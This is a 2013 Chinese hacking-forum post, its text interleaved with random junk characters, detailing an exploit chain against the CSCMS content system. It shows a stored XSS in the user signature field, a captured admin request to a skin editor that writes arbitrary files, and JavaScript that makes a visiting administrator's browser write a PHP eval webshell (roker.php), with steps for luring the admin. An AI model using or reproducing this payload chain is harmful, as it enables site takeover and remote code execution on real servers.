|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
! M. U8 V+ v+ \- ~) E5 ~官网已经修补了,所以重新下了源码
( i% F/ C n o因为 后台登入 还需要认证码 所以 注入就没看了。
! L6 v; e# ~& V存在 xss! i3 ~$ ^$ e+ n) `2 _, V: P) T
漏洞文件 user/member/skin_edit.php. i7 a" q6 W) _2 _ Z+ V m
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:6 C+ D; C3 j, d
; @; ~6 ~. |, b
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
' {; N! d7 `& U, G6 e0 F
7 i. Q; N V) C1 u</textarea></td></tr>% |/ {+ o- o: P- Q: j j
" b2 L9 h! c" H0 F+ \) M
user/do.php
2 v1 Q4 M+ X3 L4 n6 V# _; v7 Y* ^- u% B( F; g0 L
6 Q4 L( e: @' G" K6 V: T
if($op=='zl'){ //资料9 B* Q. u4 V6 s
1 [* N {0 B+ F" i
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) ; q. R3 S: m; ?( Z" u7 W# r$ {
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));& Y) H/ t' W. [0 I: o6 G. b
4 v) u0 ?1 K: a $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."', U; u8 z# K' X# r) d
# A! q0 N% a/ A. u8 m# i
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
+ o& u: c9 M" }; _- Z; k; [ where CS_Name='".$cscms_name."'";
3 o+ R# [# x8 i; _/ \6 U , a8 ]9 s/ L* r$ |4 ~! D1 l
if($db->query($sql)){
8 z6 E, v, C+ z' O) Y2 Q d/ [
0 N6 U, B) Y! I, U exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
2 m- B. \! y ], V& a
! l3 r, V3 L6 I( r& v }else{
- `: u9 h8 g) }3 B5 x1 F " o7 @$ v; A8 G/ l; @9 ]
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
$ g" F" ?3 |; q0 m
* \& q7 Y6 s% C }& v3 E, [* ^% m+ M2 x, U
* D' }% q, U1 Q' w: u
& ^1 e/ m' W8 Y. p, r1 E0 M+ h
没有 过滤导致xss产生。2 c! X9 c, l/ p% t. B' l
后台 看了下 很奇葩的是可以写任意格式文件。。
- f' W% T! F0 k; u+ l抓包。。7 P+ C. C; j7 {. Q
: a( j! ^0 r; D6 K- X- p
7 ?8 K% L( q0 O# n+ I" l2 u本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1* _" M' `* [2 x' T k: a- c
* S4 s& m" b1 C Q- T( D4 O1 z
Accept: text/html, application/xhtml+xml, */*
3 w2 A7 E4 L0 w4 P7 u' K' F* T
- D1 a0 O, w! l# {& ^5 [3 WReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php9 f' k' u/ X& e5 Z& ^: h7 a: f
5 }2 C+ N& T% b& |1 I( _& @Accept-Language: zh-CN. @4 t0 b& w- b7 Y
& ]( I9 e; g: t) h
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)7 Y- P' [0 k1 K6 e% @ b# L4 k
( B5 I4 ~, C* `Content-Type: application/x-www-form-urlencoded
* g3 |1 f ]( u* R2 u6 w, R & m5 X7 e( A a4 ^! g$ M. I( {
Accept-Encoding: gzip, deflate6 X% G% q% p, q# E% V* Y( Q
- l( Z. A' S8 e7 ]' s% P
Host: 127.0.0.1
3 z8 d+ K, _; R0 n$ n9 j* U4 I/ W 8 l% C# a. F. d3 c7 ]
Content-Length: 38
\3 p6 m( ] T& ^5 u 8 C$ A* e; Y9 S& ]& g0 w% Q! ]
DNT: 1( X1 Z, r+ y! u2 w
3 @ h8 n' [7 W; a7 }4 `# OConnection: Keep-Alive
' |7 }: H. a$ i% B) O: j. l1 k
( l4 f6 J% y$ j1 _7 m. b$ WCache-Control: no-cache
1 s/ }+ y( W$ a6 p' J5 _
* X% C2 _1 X' D6 GCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
# e2 X+ U1 ^3 E 7 A/ q5 t4 H# w" M: G% O
' O: q+ S/ N% }2 L5 A8 ]9 {1 @
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
) J& _0 q* O) f6 a6 _: I3 Q9 X% b0 U' x! M5 ~
! u3 w# @- ]. Z8 o+ X- A( K* f' Z9 }2 h7 X5 k5 q
于是 构造js如下。 q* T" w6 i$ x* V& e
/ F4 y* U& z: [* ]& b- R- u本帖隐藏的内容<script>
# U% j; B/ e: ~" gthisTHost = top.location.hostname;- T: H$ n( l+ E9 W( Z
% Z3 i- R9 D5 \9 ^8 ~8 `thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
4 V9 u O; `, y0 Q. P; m
1 X. p/ m& Q A9 F2 {3 r/ tfunction PostSubmit(url, data, msg) {
1 T; J- q, o. |9 L& H- F6 X" f var postUrl = url;: p- [4 k1 E3 |; K! Y
8 K: G9 N/ b7 V | var postData = data;
& |9 R2 Y7 K1 U var msgData = msg;
# D4 D( e9 y6 G; x) Z1 M0 ]5 d var ExportForm = document.createElement("FORM"); / ~! N+ y) a! ^
document.body.appendChild(ExportForm); ) i( k t/ x5 ~; _
ExportForm.method = "POST";
8 `+ p' Q# d5 d0 [0 t$ q7 j/ r var newElement = document.createElement("input");
! g% {% M; V |. J/ T( b& n$ ~ newElement.setAttribute("name", "name"); ) }5 ]! g* Z2 T8 o9 W. m2 ~
newElement.setAttribute("type", "hidden"); 9 m8 T @4 @$ i$ U" \. `$ |8 ^" W# a
var newElement2 = document.createElement("input");
- n" V" g, F7 n3 x8 B# t0 i6 o5 n newElement2.setAttribute("name", "content");
, `9 n: J, Z+ T! g- ? newElement2.setAttribute("type", "hidden"); % _5 }. e" K6 @8 N% ~% K, N
ExportForm.appendChild(newElement);
' n2 c& M- c: c7 [) r; \4 W ExportForm.appendChild(newElement2);
5 g8 o: J5 n6 } newElement.value = postData;
% K+ P# r3 u0 m2 N2 R) e1 v4 v0 o5 t newElement2.value = msgData; 3 h1 H2 S: Z4 n' g
ExportForm.action = postUrl; - X0 T3 c1 g) X# H7 P; a
ExportForm.submit();
7 ?! t1 \% O( B, z5 y, p};3 M1 h& x1 a- J7 U5 M
9 |( _1 x$ `0 |- S" _" GPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
/ N) }9 b5 c, a( q/ w3 F9 m / O! W ~& V4 S1 E! {) V
</script>6 S! f( b0 L _7 G. y8 B3 M
0 A2 S$ k) l$ K7 H
9 `7 B' }( q# ?- S
9 V: R( z) G ~
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
) L8 G) `% F- u% Z- f用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
6 L" E- S) g" d4 q% q2 ^就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
1 g [$ ^; P# F( Q0 K |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对